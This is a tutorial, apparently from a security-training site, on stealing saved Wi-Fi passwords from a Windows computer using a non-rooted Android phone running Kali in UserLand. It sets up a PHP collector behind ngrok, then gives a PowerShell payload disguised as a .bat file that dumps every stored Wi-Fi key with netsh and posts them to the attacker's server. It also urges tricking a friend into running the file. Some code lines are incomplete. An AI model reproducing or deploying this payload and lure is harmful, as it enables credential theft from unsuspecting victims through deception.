Aircrack-ng is the most popular way for hacking wifi passwords. However, this method takes a long time to hijack passwords. As it uses a large wordlist for cracking the AP passwords. This method needs a rooted Android device with Kali installed. We will show you a method to hack Wi-Fi passwords without rooting an Android device with a single command line.

We will use Userland applications which allow us to install Kali Linux on Android devices without rooting. Aircrack-ng will not work in Userland as it requires device root access.

So here we will start the php server on hacker mobile & ngrok is used for forwarding. And will create a payload to execute in VICTIM Windows OS.


  • For testing, we will use Xiaomi Redmi Note 4. You have install
    • UserLand –
    • ConnectBot –
  • These applications will be used to gather Wi-Fi passwords.
  • As per the ethical hacking researcher of the International Institute of Cyber Security, Userland will allow us to install different Linux distros on mobile. So here we will install Kali Linux & connect it will ConnectBot.
  • Click on Kali Linux and enter the password iicybersecurity@12345. You can write any password.

  • Type su && sudo apt-get update && sudo apt-get install net-tools
  • Type sudo apt-get install unzip && apt-mark build apache*

  • Then type sudo apt-get install php && sudo apt-get install screen

  • Type screen then again type screen

  • Type mkdir phpServer && type cd phpServer
  • Type nano index.php and this below code.
 <title> PHP Server </title>
  <h1> It works!</h1>
  $file = date("y-h-m") . ".credz" ;
  file_put_contents ($file , file_get_contents("php://input"));

  • Type php -S &
  • Type ps -ef to check whether php is running or not.

  • Type sudo apt-get install wget && type wget
  • Now type unzip, this will extract the ngrok file in the same directory.

  • Type ./ngrok authtoken <Your authtoken>

  • Type screen
  • Then type ./ngrok http 80
  • Now to run this ngrok in the background press the key combination of Ctrl+a+n, this will move the ngrok command in the background and return to the shell prompt.
  • According to the ethical hacking researcher of the International Institute of Cyber Security, this key combination can change on the mobile model.

  • Save the below code in the .bat extension. For that, you can use the WPS office application to save the bat file. Download the WPS office application:
  • Open the application Click on + & then click on Document. Paste the below code in the WPS office document editor. Save the file in payload.txt
  • Open file manager. rename file to payload.txt to payload.bat
Add-Type -AssemblyName System.Web;

$ngrokServer = "";

foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

  try {
    $oXml = New-Object System.XML.XMLDocument;
    $ssid = $oXml.WLANProfile.SSIDConfig.SSID.Name;
    $netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
    $pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
    $sendData += "SSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
  } catch {}


Invoke-WebRequest -Uri $ngrokServer -Method 'POST' -Body $sendData;
  • Now you make any social engineering trick to send this payload to your friend. Once your friend opens the payload on a Windows computer (VICTIM machine). The above code is Powershell code which when run in Powershell will extract all passwords in the VICTIM system.
  • As commented, came code is used in some malware with PowerShell to get all passwords of the VICTIM system.

  • You will get all the stored Wifi passwords to your Android device.

  • Above you can see all stored passwords of Wifi in the /home/iicybersecurity/phpServer/ directory.
  • Done.
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